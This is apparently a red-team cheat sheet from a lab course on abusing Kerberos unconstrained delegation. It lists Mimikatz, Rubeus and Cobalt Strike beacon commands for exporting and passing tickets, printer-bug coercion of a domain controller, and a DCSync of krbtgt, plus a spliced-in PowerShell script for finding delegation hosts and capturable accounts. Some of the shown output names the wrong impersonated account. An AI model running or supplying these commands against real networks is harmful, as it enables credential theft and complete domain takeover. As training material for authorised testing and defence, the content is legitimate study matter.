Unconstrained Delegation

When Kerberos Unconstrained Delegation is enabled on the server hosting the service named in the Service Principal Name of the TGS-REQ (step 3), the Domain Controller places a copy of the user's TGT (together with its session key) into the service ticket. When the user presents that service ticket (TGS) to the server, the server extracts the TGT and caches it in LSASS for later use. The application server can now impersonate that user against any service in the domain for as long as the TGT is valid, with no further limitation. The only accounts this does not work for are those the KDC refuses to forward a TGT for: accounts marked "Account is sensitive and cannot be delegated" and members of the Protected Users group. Domain controllers are configured for unconstrained delegation by default, so the interesting finds are member servers with the setting enabled.

# Verify
Get-DomainComputer -Unconstrained | select cn
# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi
# Rubeus
Rubeus.exe dump
Rubeus.exe ptt /ticket:<TICKET>
# Rubeus Monitoring
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor /targetuser:nlamb /interval:10
# Create Session and Pass Ticket
beacon> make_token DEV\nlamb FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\nlamb.kirbi
beacon> ls \\dc-2\c$
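The `Get-DomainComputer -Unconstrained` check above needs PowerView. As an added example (not code from the original page), the following does the same enumeration with plain ADSI, separates the domain controllers (which always carry the flag) from the member servers that actually matter, and adds the check a practitioner wants before waiting on `Rubeus monitor`: whether the target account can be delegated at all. The account name `nlamb` and the group name `Protected Users` are assumptions; the `memberOf` lookup only sees direct group membership.

```powershell
# Added example, not from the original page. Enumerates unconstrained-delegation
# hosts and tests whether a given account's TGT will actually be forwarded,
# using only ADSI (no PowerView / RSAT). Names used below are assumptions.

$TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit: "Trust this computer for delegation to any service"
$NOT_DELEGATED          = 0x100000  # userAccountControl bit: "Account is sensitive and cannot be delegated"
$SERVER_TRUST_ACCOUNT   = 0x2000    # userAccountControl bit set on domain controllers

function Get-UnconstrainedHosts {
    # LDAP bitwise-AND match (OID 1.2.840.113556.1.4.803) on the delegation bit.
    $searcher = [adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))"
    $searcher.PropertiesToLoad.AddRange(@('cn', 'dnshostname', 'useraccountcontrol'))
    foreach ($r in $searcher.FindAll()) {
        $uac = [int]$r.Properties['useraccountcontrol'][0]
        [pscustomobject]@{
            Name               = $r.Properties['cn'][0]
            DnsHostName        = $r.Properties['dnshostname'][0]
            # DCs have the flag by default; member servers with it are the real finds.
            IsDomainController = [bool]($uac -band $SERVER_TRUST_ACCOUNT)
        }
    }
}

function Test-DelegationAllowed {
    param([Parameter(Mandatory)][string]$SamAccountName)
    $searcher = [adsisearcher]"(&(objectClass=user)(sAMAccountName=$SamAccountName))"
    $searcher.PropertiesToLoad.AddRange(@('useraccountcontrol', 'memberof'))
    $r = $searcher.FindOne()
    if (-not $r) { throw "Account $SamAccountName not found" }
    $uac       = [int]$r.Properties['useraccountcontrol'][0]
    $sensitive = [bool]($uac -band $NOT_DELEGATED)
    # Direct membership only; group name assumed to be the default "Protected Users".
    $protected = [bool](@($r.Properties['memberof']) -match '^CN=Protected Users,')
    [pscustomobject]@{
        Account            = $SamAccountName
        Sensitive          = $sensitive
        ProtectedUsers     = $protected
        # The KDC will not forward a TGT for either class of account, so no TGT
        # will ever land in LSASS on the unconstrained host for them.
        TgtWillBeForwarded = -not ($sensitive -or $protected)
    }
}

# Usage: list non-DC hosts trusted for delegation, then check the target user.
Get-UnconstrainedHosts | Where-Object { -not $_.IsDomainController }
Test-DelegationAllowed -SamAccountName 'nlamb'
```

If `TgtWillBeForwarded` is false for the target, `Rubeus monitor` will never see that user's TGT no matter how often they authenticate to the host; pick a different account, or fall back to coercing a machine account (such as the DC, as in the printer bug section) instead.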
Printer Bug
# https://github.com/leechristensen/SpoolSample
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor /targetuser:DC-2$ /interval:10 /nowrap
beacon> execute-assembly C:\Tools\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe dc-2 srv-1
PS> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\dc-2.kirbi", [System.Convert]::FromBase64String("<base64-ticket>"))
beacon> make_token DEV\DC-2$ FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\dc-2.kirbi
beacon> dcsync dev.cyberbotic.io DEV\krbtgt